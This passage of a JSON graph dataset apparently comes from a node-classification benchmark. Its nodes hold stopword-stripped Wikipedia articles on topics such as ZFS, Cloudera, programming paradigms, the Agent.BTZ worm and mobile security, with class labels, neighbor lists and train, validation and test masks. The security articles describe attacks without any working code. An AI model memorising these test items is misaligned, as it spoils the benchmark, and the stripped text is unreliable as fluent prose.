solaris 10 june 2006 one year opening opensolaris community name one point said stand zettabyte file system 2006 longer considered abbreviation zfs file system store 256 quadrillion zettabytes zb september 2007 netapp sued sun claiming zfs infringed netapp patents write anywhere file layout sun counter-sued october year claiming opposite lawsuits ended 2010 undisclosed settlement following list events development open-source zfs implementations first indication apple inc. interest zfs april 2006 post opensolaris.org zfs-discuss mailing list apple employee mentioned interested porting zfs mac os x operating system release version mac os x 10.5 zfs available read-only mode command line lacks possibility create zpools write 10.5 release apple released zfs beta seed v1.1 allowed read-write access creation zpools however installer zfs beta seed v1.1 reported work version 10.5.0 updated version 10.5.1 august 2007 apple opened zfs project mac os forge web site site apple provided source code binaries port zfs includes read-write access installer available third-party developer created one october 2009 apple announced shutdown zfs project mac os forge say hosting involvement zfs summarily discontinued explanation given following statement zfs project discontinued mailing list repository also removed shortly apple would eventually release legally required cddl-derived portion source code final public beta zfs code named 10a286 complete zfs support advertised feature snow leopard server mac os x server 10.6 however time operating system released references feature silently removed features page apple commented regarding omission apple 10a286 source code release versions previously released source binaries preserved new development adopted group enthusiasts maczfs project acted quickly mirror public archives apple project materials would disappeared internet resume development elsewhere maczfs community curated matured project supporting zfs mac os releases since 10.5 project active mailing list july 2012 maczfs implements zpool version 8 zfs version 2 october 2008 release solaris additional historical information commentary found maczfs web site faq 17th september 2013 launch openzfs included zfs-osx become new version maczfs distribution darwin zfs oracle solaris new features introduced version numbers pool file system incremented designate format features available features available specific file system versions require specific pool version distributed development openzfs involves feature flags pool version 5000 unchanging number expected never conflict version numbers given oracle legacy version numbers still exist pool versions 1–28 implied version 5000 illumos uses pool version 5000 purpose future on-disk format changes enabled disabled independently via feature flags note solaris version development sun since release solaris 10 2005 codenamed 'nevada derived opensolaris codebase 'solaris nevada codename next-generation solaris os eventually succeed solaris 10 new code pulled successively new opensolaris 'nevada snapshot builds opensolaris discontinued openindiana forked final build b134 opensolaris published oracle 2010-nov-12 upgrade path solaris 11 express",
    "neighbors": [
      2051,
      10257,
      8214,
      39,
      10302,
      8266,
      2123,
      2135,
      4184,
      10327,
      2141,
      2149,
      8303,
      6263,
      2180,
      4235,
      2193,
      2194,
      2197,
      2199,
      2207,
      2212,
      6309,
      10405,
      6322,
      2230,
      2232,
      8379,
      8380,
      6338,
      10436,
      8395,
      8402,
      8404,
      10455,
      6361,
      8410,
      6365,
      231,
      2288,
      2291,
      8436,
      246,
      8441,
      8446,
      2314,
      8461,
      6416,
      10512,
      274,
      287,
      6434,
      2339,
      6438,
      10535,
      6445,
      302,
      2378,
      4431,
      4438,
      346,
      2395,
      6491,
      2397,
      10596,
      2407,
      4457,
      366,
      2415,
      2421,
      6519,
      376,
      2424,
      381,
      394,
      6545,
      10643,
      414,
      8631,
      8643,
      463,
      4561,
      4571,
      2525,
      487,
      2545,
      499,
      2555,
      2564,
      4615,
      10761,
      6669,
      6677,
      4636,
      10789,
      6700,
      10811,
      8772,
      4686,
      597,
      10843,
      4702,
      607,
      10851,
      4708,
      8816,
      6771,
      2676,
      631,
      2687,
      10888,
      654,
      8852,
      2710,
      684,
      8877,
      6849,
      10951,
      713,
      8909,
      6864,
      4819,
      728,
      739,
      8938,
      4858,
      2819,
      11012,
      6935,
      4888,
      11033,
      11037,
      8994,
      6947,
      811,
      4907,
      4908,
      9004,
      6961,
      9009,
      6963,
      823,
      2871,
      6970,
      11072,
      4933,
      9035,
      2895,
      850,
      2901,
      4960,
      7022,
      7027,
      11128,
      11129,
      890,
      9100,
      7053,
      5013,
      2966,
      2967,
      9109,
      2974,
      7070,
      7072,
      11184,
      3006,
      7104,
      7118,
      11221,
      7126,
      3035,
      5093,
      998,
      9189,
      7148,
      9201,
      3058,
      5106,
      11256,
      11257,
      7163,
      5120,
      1042,
      9236,
      5142,
      1049,
      9249,
      5158,
      1071,
      1074,
      5177,
      7225,
      11323,
      7229,
      11332,
      7244,
      7249,
      1109,
      9306,
      11363,
      5233,
      9333,
      9335,
      5240,
      9343,
      11402,
      7318,
      11419,
      3228,
      5280,
      1190,
      5286,
      5292,
      5293,
      3247,
      3248,
      7344,
      1212,
      9406,
      3265,
      11459,
      9418,
      9420,
      7378,
      3285,
      9430,
      5335,
      7383,
      9451,
      1263,
      3312,
      11506,
      1273,
      7422,
      3328,
      7425,
      11521,
      1286,
      5397,
      1316,
      5413,
      3366,
      3368,
      3371,
      11568,
      11573,
      1361,
      5471,
      7521,
      11626,
      1394,
      11638,
      1399,
      7554,
      7565,
      1422,
      9625,
      11675,
      11676,
      1439,
      1454,
      11698,
      7603,
      1464,
      1465,
      9665,
      3522,
      9671,
      1480,
      3551,
      1509,
      7663,
      3582,
      9731,
      3598,
      5647,
      5658,
      3611,
      5661,
      9762,
      5677,
      3640,
      9784,
      5710,
      5713,
      3670,
      9836,
      7789,
      7794,
      9844,
      7802,
      5755,
      3719,
      7818,
      3725,
      1707,
      1710,
      1718,
      3766,
      5816,
      7863,
      9912,
      5819,
      9927,
      9931,
      3790,
      3795,
      7907,
      9955,
      5872,
      3826,
      7928,
      3834,
      3841,
      1796,
      1801,
      10000,
      1809,
      1810,
      3859,
      10016,
      1825,
      7983,
      1844,
      10036,
      3909,
      8007,
      5969,
      1891,
      10087,
      6003,
      6014,
      1927,
      8075,
      8077,
      6033,
      1946,
      6049,
      10149,
      10151,
      4012,
      6062,
      1970,
      8114,
      1978,
      1990,
      1993,
      10200,
      10202,
      2015,
      4068,
      4073,
      10221,
      8179
    ],
    "mask": "Test"
  },
  {
    "node_id": 9344,
    "label": 7,
    "text": "Cloudera:cloudera cloudera inc. us-based software company provides software platform data engineering data warehousing machine learning analytics runs cloud premises cloudera started hybrid open-source apache hadoop distribution cdh cloudera distribution including apache hadoop targeted enterprise-class deployments technology cloudera states 50 engineering output donated upstream various apache-licensed open source projects apache spark apache hive apache avro apache hbase combine form apache hadoop platform cloudera also sponsor apache software foundation cloudera founded 2008 three engineers google yahoo facebook christophe bisciglia amr awadallah jeff hammerbacher respectively joined former oracle executive mike olson form cloudera 2008 olson ceo sleepycat software creator open-source embedded database engine berkeley db acquired oracle 2006 awadallah yahoo ran one first business units using apache hadoop data analysis facebook hammerbacher used hadoop building analytic applications involving massive volumes user data architect doug cutting also former chairman apache software foundation authored open-source lucene nutch search technologies mike cafarella wrote initial hadoop software 2004 designed managed hadoop storage analysis cluster yahoo joining cloudera 2009 chief operating officer kirk dunn 2015 march 2009 cloudera announced availability cloudera distribution including apache hadoop conjunction 5 million investment led accel partners 2011 company raised 40 million ignition partners accel partners greylock partners meritech capital partners in-q-tel venture capital firm open connections cia june 2013 tom reilly became chief executive although olson remained chairman board chief strategist reilly chief executive arcsight acquired hewlett-packard 2010 march 2014 cloudera announced 900 million funding round led intel capital 740 million intel received 18 share cloudera intel dropped hadoop distribution dedicated 70 intel engineers work exclusively cloudera projects additional funds came rowe price google ventures affiliate msd capital l.p. private investment firm michael s. dell others january 2012 oracle corporation announced partnership cloudera oracle big data appliance january 2013 dell announced partnership cloudera march 2013 intel invested 740 million cloudera 18 investment may 2013 sas institute announced partnership june 2014 accenture announced service offering based cloudera june 2014 cloudera acquired gazzang developed encryption key management software october 2014 cloudera announced first payment card industry data security standard pci mastercard february 2015 deloitte announced alliance cloudera may 2015 capgemini announced marketing program sap hana cloudera july 9 2015 cloudera announced partnership teradata september 2015 cloudera announced kudu storage manager september 2015 microsoft azure announced full support cloudera enterprise january 2016 tata consultancy services announced internet things framework based cloudera sensor data analytics february 2016 emc announces evolution advanced storage dssd support cloudera 2016 cloudera ranked 5 forbes cloud 100 list cloudera filed initial public offering march 2017 april 28 2017 shares listed new york stock exchange symbol cldr september 2017 cloudera acquired fast forward labs ffl leading machine learning applied artificial intelligence research development company effort deepen cloudera ’ expertise application machine learning practical business problems new division headed ffl co-founder ceo hilary mason october 2018 cloudera hortonworks announced would merging all-stock merger equals.. merger completed january 2019 cloudera offers software services support five bundles available on-premise across multiple cloud providers cloudera also offers managed-service offering cloud cloudera also offers following free software versions additional technologies addition open-source distribution",
    "neighbors": [
      5384,
      11016,
      6156,
      1935,
      8217,
      11161,
      8735,
      10661,
      1594,
      1222,
      5332,
      982,
      8408,
      9179,
      11111,
      8810,
      747,
      10738,
      2163,
      1400,
      4604
    ],
    "mask": "Test"
  },
  {
    "node_id": 9345,
    "label": 9,
    "text": "Programming_paradigm:programming paradigm programming paradigms way classify programming languages based features languages classified multiple paradigms paradigms concerned mainly implications execution model language allowing side effects whether sequence operations defined execution model paradigms concerned mainly way code organized grouping code units along state modified code yet others concerned mainly style syntax grammar common programming paradigms include symbolic techniques reflection allow program refer might also considered programming paradigm however compatible major paradigms thus real paradigm right example languages fall imperative paradigm two main features state order operations occur constructs explicitly control order allow side effects state modified one point time within one unit code later read different point time inside different unit code communication units code explicit meanwhile object-oriented programming code organized objects contain state modified code part object object-oriented languages also imperative languages contrast languages fit declarative paradigm state order execute operations instead supply number operations available system along conditions allowed execute implementation language execution model tracks operations free execute chooses order comparison multi-paradigm programming languages software engineering process defined differing methodologies programming languages models computation defined differing paradigms languages designed support one paradigm smalltalk supports object-oriented programming haskell supports functional programming programming languages support multiple paradigms object pascal c++ java c scala visual basic common lisp scheme perl php python ruby wolfram language oz f example programs written c++ object pascal php purely procedural purely object-oriented contain elements paradigms software designers programmers decide use paradigm elements object-oriented programming programs treated set interacting objects functional programming programs treated sequence stateless function evaluations programming computers systems many processors process-oriented programming programs treated sets concurrent processes act logical shared data structures many programming paradigms well known techniques forbid enable instance pure functional programming disallows use side-effects structured programming disallows use goto statement partly reason new paradigms often regarded doctrinaire overly rigid accustomed earlier styles yet avoiding certain techniques make easier understand program behavior prove theorems program correctness programming paradigms also compared programming models allow invoking execution model using api programming models also classified paradigms based features execution model parallel computing using programming model instead language common reason details parallel hardware leak abstractions used program hardware causes programmer map patterns algorithm onto patterns execution model inserted due leakage hardware abstraction consequence one parallel programming language maps well computation problems thus convenient use base sequential language insert api calls parallel execution models via programming model parallel programming models classified according abstractions reflect hardware shared memory distributed memory message passing notions place visible code forth considered flavors programming paradigm apply parallel languages programming models programming language researchers criticise notion paradigms classification programming languages e.g harper krishnamurthi argue many programming languages strictly classified one paradigm rather include features several paradigms see comparison multi-paradigm programming languages different approaches programming developed time identified either time retrospectively early approach consciously identified structured programming advocated since mid 1960s concept programming paradigm dates least 1978 turing award lecture robert w. floyd entitled paradigms programming cites notion paradigm used thomas kuhn structure scientific revolutions 1962 lowest-level programming paradigms machine code directly represents instructions contents program memory sequence numbers assembly language machine instructions represented mnemonics memory addresses given symbolic labels sometimes called first- second-generation languages 1960s assembly languages developed support library copy quite sophisticated conditional macro generation preprocessing abilities call subroutines external variables common sections globals enabling significant code re-use isolation hardware specifics via use logical operators read/write/get/put assembly still used time critical systems often embedded systems gives direct control machine next advance development procedural languages third-generation languages first described high-level languages use vocabulary related problem solved example languages follow procedural paradigm describe step step exactly procedure according particular programmer least followed solve specific problem efficacy efficiency solution therefore entirely subjective highly dependent programmer experience inventiveness ability following widespread use procedural languages object-oriented programming oop languages created simula smalltalk c++ c eiffel php java languages data methods manipulate kept one unit called object perfect encapsulation one distinguishing features oop way another object user would able access data via object methods thus inner workings object may changed without affecting code uses object still controversy raised alexander stepanov richard stallman programmers concerning efficacy oop paradigm versus procedural paradigm need every object associative methods leads skeptics associate oop software bloat attempt resolve dilemma came polymorphism object-oriented programming considered paradigm language possible create even object-oriented assembler language high level assembly hla example fully supports advanced data types object-oriented assembly language programming despite early origins thus differing programming paradigms seen rather like motivational memes advocates rather necessarily representing progress one level next precise comparisons efficacy competing paradigms frequently made difficult new differing terminology applied similar entities processes together numerous implementation distinctions across languages literate programming form imperative programming structures programs human-centered web hypertext essay documentation integral program program structured following logic prose exposition rather compiler convenience independent imperative branch declarative programming paradigms developed languages computer told problem solve problem program structured set properties find expected result procedure follow given database set rules computer tries find solution matching desired properties archetype declarative language fourth generation language sql family functional languages logic programming functional programming subset declarative programming programs written using paradigm use functions blocks code intended behave like mathematical functions functional languages discourage changes value variables assignment making great deal use recursion instead logic programming paradigm views computation automated reasoning body knowledge facts problem domain expressed logic formulas programs executed applying inference rules answer problem found set formulas proved inconsistent symbolic programming paradigm describes programs able manipulate formulas program components data programs thus effectively modify appear learn making suited applications artificial intelligence expert systems natural-language processing computer games languages support paradigm include lisp prolog differentiable programming structures programs differentiated throughout usually via automatic differentiation programming languages support one programming paradigm allow programmers use suitable programming style associated language constructs given job",
    "neighbors": [
      4107,
      2062,
      15,
      6160,
      4121,
      8225,
      8226,
      6182,
      2105,
      8262,
      6228,
      8293,
      119,
      136,
      10387,
      159,
      2216,
      10413,
      2225,
      191,
      2242,
      219,
      10463,
      228,
      8421,
      10470,
      10471,
      2283,
      8430,
      8435,
      4341,
      2294,
      256,
      4354,
      6406,
      267,
      2335,
      6437,
      4398,
      2351,
      305,
      10547,
      6454,
      8502,
      4410,
      2364,
      4412,
      2374,
      10568,
      10569,
      10571,
      8524,
      338,
      348,
      4446,
      10593,
      6502,
      8554,
      10617,
      2432,
      4483,
      4486,
      8582,
      8598,
      10649,
      4507,
      6558,
      10658,
      8611,
      4516,
      428,
      10672,
      8628,
      10680,
      6594,
      8644,
      4550,
      2505,
      2519,
      10712,
      477,
      4576,
      10720,
      6629,
      10739,
      502,
      2556,
      2558,
      511,
      512,
      10752,
      515,
      4614,
      8728,
      8738,
      2599,
      4656,
      2617,
      2618,
      6718,
      8771,
      10819,
      10824,
      2666,
      8810,
      623,
      6775,
      2680,
      2691,
      8854,
      10909,
      4770,
      4777,
      6826,
      692,
      10953,
      8908,
      721,
      8915,
      2774,
      731,
      4838,
      4840,
      10991,
      2804,
      4865,
      11010,
      6919,
      2830,
      786,
      9034,
      11083,
      847,
      4943,
      11090,
      2901,
      9050,
      862,
      11102,
      7026,
      11125,
      9078,
      11132,
      9103,
      7076,
      5031,
      939,
      11218,
      11219,
      5079,
      7128,
      5081,
      3034,
      987,
      11227,
      11228,
      7144,
      9192,
      11242,
      3051,
      1019,
      7172,
      11269,
      9224,
      9231,
      1051,
      5148,
      9245,
      5165,
      3120,
      5168,
      7219,
      3132,
      7237,
      3144,
      11339,
      5204,
      3159,
      7259,
      1130,
      9323,
      9330,
      9331,
      1145,
      3193,
      3196,
      5245,
      7292,
      9351,
      11403,
      7308,
      3229,
      7326,
      9376,
      9385,
      7343,
      1203,
      7355,
      11457,
      11474,
      5336,
      7386,
      11487,
      7392,
      5347,
      7395,
      7398,
      11497,
      9454,
      5361,
      5365,
      5373,
      7421,
      3334,
      5395,
      1301,
      5404,
      5409,
      11555,
      3370,
      3374,
      1333,
      11574,
      7486,
      1349,
      1359,
      3414,
      7513,
      11610,
      9575,
      1388,
      1390,
      3442,
      3446,
      11641,
      3462,
      7558,
      7562,
      7571,
      5527,
      9626,
      1435,
      7580,
      11688,
      7616,
      5569,
      1480,
      3529,
      5585,
      9688,
      7646,
      9710,
      9714,
      9715,
      7671,
      3577,
      9735,
      5651,
      1565,
      3613,
      1568,
      5677,
      5679,
      5680,
      9780,
      1591,
      7738,
      9788,
      7749,
      1610,
      1611,
      9804,
      5719,
      7769,
      3675,
      7775,
      7780,
      3698,
      3705,
      3712,
      5760,
      5774,
      5803,
      7851,
      3762,
      7867,
      9915,
      9926,
      5833,
      9932,
      7889,
      5845,
      1750,
      7904,
      9960,
      5880,
      1801,
      3869,
      5920,
      1826,
      3876,
      7983,
      1841,
      10042,
      3904,
      3910,
      1864,
      10061,
      1890,
      10083,
      8041,
      10089,
      5997,
      10097,
      3960,
      6016,
      6032,
      8082,
      3999,
      1953,
      10146,
      8116,
      6074,
      8122,
      4042,
      10198,
      2013,
      4064,
      10228,
      6137,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9346,
    "label": 4,
    "text": "Agent.BTZ:agent.btz agent.btz also named autorun computer worm infects usb flash drives spyware variant sillyfdc worm used massive 2008 cyberattack us military agent.btz worm dll file written assembler x86-32 bit spreads creating autorun.inf file root drive dll file ability scan computers data open backdoors send backdoors remote command control server 2008 us military base middle east usb flash drive infected agent.btz inserted laptop attached united states central command spread undetected systems classified unclassified order try stop spread worm pentagon banned usb drives removable media device also disabled windows autorun feature computers pentagon spent nearly 14 months cleaning worm military networks russian hackers thought behind attack used code made agent.btz previous attacks according article economist clear agent.btz designed specifically target military networks indeed comes either russia china article los angeles times reported us defense officials described malicious software apparently designed specifically target military networks thought inside russia although clear whether destructive program created individual hacker whether russian government may involvement 2010 american journalist noah shachtman wrote article investigate theory worm written single hacker later analyses kaspersky lab found relations spyware including red october turla flame december 2016 united states fbi dhs issued joint analysis report included attribution agent.btz one russian civilian military intelligence services ris",
    "neighbors": [
      7809,
      5764,
      107,
      10392,
      2041,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 9347,
    "label": 7,
    "text": "Online_office_suite:online office suite online office suite online productivity suite cloud office suite office suite offered form web application accessed online using web browser allows people work together worldwide time thereby leading web-based collaboration virtual teamwork online office suites installed on-premises offered software service latter basic versions offered free advanced versions often made available subscription fee latest offerings created run pure html5 web pages known progressive web apps longer requiring cloud online connection function online office suites exist proprietary open-source software online office suite may include broad set applications following document creation editing applications publishing applications collaborative applications management applications",
    "neighbors": [
      546,
      3690,
      3691,
      11372,
      7983,
      467,
      1302,
      2328,
      1817,
      2046,
      6367
    ],
    "mask": "None"
  },
  {
    "node_id": 9348,
    "label": 2,
    "text": "ADO.NET_data_provider:ado.net data provider ado.net data provider software component interacts data source ado.net data providers analogous odbc drivers jdbc drivers ole db providers ado.net providers created access simple data stores text file spreadsheet complex databases oracle database microsoft sql server mysql postgresql sqlite ibm db2 sybase ase many others also provide access hierarchical data stores email systems however different data store technologies different capabilities every ado.net provider implement every possible interface available ado.net standard microsoft describes availability interface provider-specific may applicable depending data store technology involved note also providers may augment capabilities data store capabilities known services microsoft parlance components data provider include",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      2603,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      10340,
      1656,
      9340,
      5761,
      5765,
      10886,
      2183,
      4231,
      5259,
      653,
      6797,
      9362,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      270,
      6927,
      9491,
      11030,
      5401,
      4384,
      2854,
      11559,
      10024,
      10026,
      11570,
      1347,
      1348,
      844,
      2901,
      8539,
      10079,
      11616,
      7022,
      2943,
      10624,
      9609,
      9612,
      9114,
      3997,
      10654,
      8607,
      11683,
      5546,
      6584,
      7100,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      5104,
      3573,
      10229,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 9349,
    "label": 9,
    "text": "Sanguino3_G-Code:sanguino3 g-code sanguino3 g-code protocol 3rd-generation reprap project electronics communicate host machine well protocol reprap host communicates subsystems also written binary format storage later replay usually file .s3g extension protocol intended simplification g-code ease processing somewhat limited cpu sanguino arduino-based controller",
    "neighbors": [
      4121
    ],
    "mask": "Test"
  },
  {
    "node_id": 9350,
    "label": 9,
    "text": "Advanced_Multimedia_Supplements:advanced multimedia supplements computing advanced multimedia supplements also jsr-234 amms api specification java platform practically speaking extension jsr 135 mobile media api providing new features positional 3d audio processing audio video effects processing better controls digital camera better support analog radio tuner including radio data system amms developed java community process jsr 234 jsr-234 defines six feature sets namely media capabilities define minimum implementation requirements order try avoid fragmentation define common minimal base line implementations every jsr-234 implementation must support least one media capability six media capabilities described table addition media capabilities device free support optional features including also implementations targeted mainly mobile device manufacturers",
    "neighbors": [
      4960,
      3561,
      3626,
      7246,
      9011,
      3416
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9351,
    "label": 2,
    "text": "IBM_Power_(software):ibm power software power ibm operating system enhancement package provided spooling facilities ibm system/360 running dos/360 retrofitted modified dos/360 upgrades power/vs power/vse available ibm system/370 running dos/vs dos/vse respectively power acronym priority output writers execution processors input readers power operating system enhancement available dos/360 dos/vs dos/vse came packaged third party dos-based operating systems international business machines released power 1969 following public introduction ibm wall street data center 'spooled queued printer card data freeing programs dependent upon speed printers punched card equipment power competed non-ibm products namely datacorp spooler sdi grasp unlike products power required dedicated partition allowed single printer 1403/2311 punch 2520 2540 reader 2540 2501 shared two processing partitions input data asynchronously loaded directed proper partition job class output directed disk stored directed printer punch writer type prt pun job class priority form code provided prt pun control cards input stream operator put proper form printer/punch told power start g pun g prt console device would continue output type available new form encountered would alert operator change forms wait next go command product ran ibm systems s/360 model 30 larger machines generally smaller machines less 128k core memory would called ram today actually magnetic cores strung wire matrices ability run power power/vs ran well later s/370 series usually models 135 145 later 4331 4341 product ran several dos-related platforms hardware platforms included clones included",
    "neighbors": [
      3969,
      9345,
      4483,
      10756,
      4107,
      10508,
      10392,
      2075,
      3493,
      10617,
      9771,
      7983,
      9137,
      1970,
      11457,
      1219,
      8900,
      3529,
      3916,
      10061,
      467,
      7515,
      7775,
      2283,
      877,
      3320,
      2041,
      3323,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 9352,
    "label": 5,
    "text": "Directory_Access_Protocol:directory access protocol directory access protocol dap computer networking standard promulgated itu-t iso 1988 accessing x.500 directory service dap intended used client computer systems popular implementations full osi protocol stack desktop computers available run hardware operating systems typical time basic operations dap bind read list search compare modify add delete modifyrdn adapted novell directory services nds internet lightweight directory access protocol ldap dap specified x.511",
    "neighbors": [
      6651,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 9353,
    "label": 2,
    "text": "Red_Hat_Linux:red hat linux red hat linux created company red hat widely used linux distribution discontinuation 2004 early releases red hat linux called red hat commercial linux red hat published first non-beta release may 1995 first linux distribution use rpm package manager packaging format time served starting point several distributions mandriva linux yellow dog linux 2003 red hat discontinued red hat linux line favor red hat enterprise linux rhel enterprise environments fedora developed community-supported fedora project sponsored red hat free-of-cost alternative intended home use red hat linux 9 final release hit official end-of-life april 30 2004 although updates published 2006 fedora legacy project shut early 2007 version 3.0.3 one first linux distributions support executable linkable format instead older a.out format red hat linux introduced graphical installer called anaconda developed ketan bagal intended easy use novices since adopted linux distributions also introduced built-in tool called lokkit configuring firewall capabilities version 6 red hat moved glibc 2.1 egcs-1.2 2.2 kernel also introduced kudzu software library automatic discovery configuration hardware version 7 released preparation 2.4 kernel although first release still used stable 2.2 kernel glibc updated version 2.1.92 beta upcoming version 2.2 red hat used patched version gcc cvs called 2.96 decision ship unstable gcc version due gcc 2.95 bad performance non-i386 platforms especially dec alpha newer gccs also improved support c++ standard caused much existing code compile particular use non-released version gcc caused criticism e.g linus torvalds gcc steering committee red hat forced defend decision gcc 2.96 failed compile linux kernel software used red hat due stricter checks also incompatible c++ abi compilers distribution included previous version gcc compiling kernel called kgcc red hat linux 7.0 utf-8 enabled default character encoding system little effect english-speaking users enabled much easier internationalisation seamless support multiple languages including ideographic bi-directional complex script languages along european languages however cause negative reactions among existing western european users whose legacy iso-8859-based setups broken change version 8.0 also second include bluecurve desktop theme used common theme gnome-2 kde 3.0.2 desktops well openoffice-1.0 kde members appreciate change claiming best interests kde version 9 supported native posix thread library ported 2.4 series kernels red hat red hat linux lacked many features due possible copyright patent problems example mp3 support disabled rhythmbox xmms instead red hat recommended using ogg vorbis patents mp3 support however could installed afterwards although royalties required everywhere mp3 patented support microsoft ntfs file system also missing could freely installed well red hat linux originally developed exclusively inside red hat feedback users coming bug reports contributions included software packages – contributions distribution changed late 2003 red hat linux merged community-based fedora project new plan draw codebase fedora creating new red hat enterprise linux distributions fedora replaces original red hat linux download retail version model similar relationship netscape communicator mozilla staroffice openoffice.org although case resulting commercial product also fully free software release dates drawn announcements comp.os.linux.announce version names chosen cognitively related prior release yet related way release fedora red hat projects merged september 22 2003",
    "neighbors": [
      6150,
      9742,
      15,
      1553,
      6675,
      10780,
      3618,
      9762,
      9253,
      11305,
      10797,
      1584,
      56,
      59,
      5179,
      4673,
      3142,
      1110,
      2134,
      4186,
      5723,
      2143,
      3685,
      10860,
      5742,
      2671,
      4729,
      5243,
      11388,
      8837,
      7311,
      2193,
      2197,
      2201,
      10394,
      6302,
      673,
      3745,
      7854,
      9902,
      2738,
      4790,
      1212,
      9921,
      8907,
      3791,
      6352,
      10961,
      10462,
      4841,
      6890,
      7913,
      9455,
      7920,
      5363,
      9461,
      6393,
      8957,
      8455,
      7435,
      10511,
      2321,
      1813,
      5397,
      4887,
      10016,
      10530,
      823,
      3387,
      7483,
      3903,
      3395,
      10051,
      2375,
      3400,
      2377,
      8539,
      4961,
      2914,
      5988,
      9064,
      8554,
      7020,
      7534,
      10096,
      9074,
      6521,
      11643,
      11135,
      8578,
      7555,
      10127,
      2974,
      10149,
      439,
      10172,
      1469,
      4039,
      5067,
      9693,
      485,
      5096,
      8177,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 9354,
    "label": 9,
    "text": "Codea:codea codea lua code editor ios devices made two lives left designed rapidly prototyping visual ideas especially games simulations finished projects exported directly app xcode closely related processing programming language using many methods drawing functions found processing codea released app store late 2011 making one first ios lua editors april 2012 first game programmed entirely ipad using codea released app store march 2014 codea 2.0 released added 64-bit architecture redesigned code editor various api improvements october 4 2017 version 2.5 released added 3d voxel editing capability construction 3d worlds loading 3d models wavefront .obj file format also added february 2018 latest version codea released 2.52",
    "neighbors": [
      4777,
      4186,
      10478,
      9063
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9355,
    "label": 2,
    "text": "Input/Output_Configuration_Program:input/output configuration program original s/360 s/370 architectures processor set i/o channels addressed i/o devices 12-bit cuu address containing 4-bit channel number 8-bit unit device number sent channel bus order select device operating system configured reflect processor cuu address device operating system logic queue pending i/o channel handle selection alternate channels initiating i/o channel different processor required causing shoulder tap interrupt processor could initiate i/o starting ibm 3081 ibm 4381 s/370-extended architecture mode ibm changed i/o architecture allow channel subsystem handle channel scheduling operating system handle s/370 mode new i/o architecture used 16-bit channel path id chpid channel subsystem responsible mapping chpid channel device numbers queuing i/o requests selecting available paths installation responsible defining input/output configuration data sets iocds operator could select specific iocds part power reset por input/output configuration program iocp program ibm mainframes compiles description channel subsystem lpar configuration optionally loading input/output configuration data set iocds recognizes syntax mvs configuration program mvscp input need maintain separate input files direct use iocp mvscp mostly supplanted hardware configuration definition hcd",
    "neighbors": [
      8275,
      10508,
      6325,
      7983
    ],
    "mask": "Train"
  },
  {
    "node_id": 9356,
    "label": 4,
    "text": "Mobile_security:mobile security mobile security specifically mobile device security become increasingly important mobile computing particular concern security personal business information stored smartphones users businesses use smartphones communicate also plan organize users work also private life within companies technologies causing profound changes organization information systems therefore become source new risks indeed smartphones collect compile increasing amount sensitive information access must controlled protect privacy user intellectual property company smartphones computers preferred targets attacks attacks exploit weaknesses inherent smartphones come communication mode—like short message service sms aka text messaging multimedia messaging service mms wifi bluetooth gsm de facto global standard mobile communications also exploits target software vulnerabilities browser operating system malicious software relies weak knowledge average user security countermeasures developed applied smartphones security different layers software dissemination information end users good practices observed levels design use development operating systems software layers downloadable apps smartphone user exposed various threats use phone last two-quarters 2012 number unique mobile threats grew 261 according abi research threats disrupt operation smartphone transmit modify user data applications must guarantee privacy integrity information handle addition since apps could malware functionality activities limited example restricting apps accessing location information via gps blocking access user address book preventing transmission data network sending sms messages billed user etc. three prime targets attackers number threats mobile devices including annoyance stealing money invading privacy propagation malicious tools source attacks actors found non-mobile computing space smartphone infected attacker attacker attempt several things attacks derive flaws management sms mms mobile phone models problems managing binary sms messages possible sending ill-formed block cause phone restart leading denial service attacks user siemens s55 received text message containing chinese character would lead denial service another case standard requires maximum size nokia mail address 32 characters nokia phones verify standard user enters email address 32 characters leads complete dysfunction e-mail handler puts commission attack called curse silence study safety sms infrastructure revealed sms messages sent internet used perform distributed denial service ddos attack mobile telecommunications infrastructure big city attack exploits delays delivery messages overload network another potential attack could begin phone sends mms phones attachment attachment infected virus upon receipt mms user choose open attachment opened phone infected virus sends mms infected attachment contacts address book real-world example attack virus commwarrior uses address book sends mms messages including infected file recipients user installs software received via mms message virus began send messages recipients taken address book attacker may try break encryption mobile network gsm network encryption algorithms belong family algorithms called a5 due policy security obscurity possible openly test robustness algorithms originally two variants algorithm a5/1 a5/2 stream ciphers former designed relatively strong latter designed weak purpose allow easy cryptanalysis eavesdropping etsi forced countries typically outside europe use a5/2 since encryption algorithm made public proved possible break encryption a5/2 could broken fly a5/1 6 hours july 2007 3gpp approved change request prohibit implementation a5/2 new mobile phones means decommissioned longer implemented mobile phones stronger public algorithms added gsm standard a5/3 a5/4 block ciphers otherwise known kasumi uea1 published etsi network support a5/1 a5 algorithm implemented phone base station specify a5/0 null-algorithm whereby radio traffic sent unencrypted even case mobile phones able use 3g 4g much stronger encryption 2g gsm base station downgrade radio communication 2g gsm specify a5/0 encryption basis eavesdropping attacks mobile radio networks using fake base station commonly called imsi catcher addition tracing mobile terminals difficult since time mobile terminal accessing accessed network new temporary identity tmsi allocated mobile terminal tsmi used identity mobile terminal next time accesses network tmsi sent mobile terminal encrypted messages encryption algorithm gsm broken attacker intercept unencrypted communications made victim smartphone attacker try eavesdrop wi-fi communications derive information e.g username password type attack unique smartphones vulnerable attacks often wi-fi means communication access internet security wireless networks wlan thus important subject initially wireless networks secured wep keys weakness wep short encryption key connected clients addition several reductions search space keys found researchers wireless networks protected wpa security protocol wpa based temporal key integrity protocol tkip designed allow migration wep wpa equipment already deployed major improvements security dynamic encryption keys small networks wpa pre-shared key based shared key encryption vulnerable length shared key short limited opportunities input i.e numeric keypad mobile phone users might define short encryption keys contain numbers increases likelihood attacker succeeds brute-force attack successor wpa called wpa2 supposed safe enough withstand brute force attack gsm attacker succeeds breaking identification key possible attack phone also entire network connected many smartphones wireless lans remember already connected 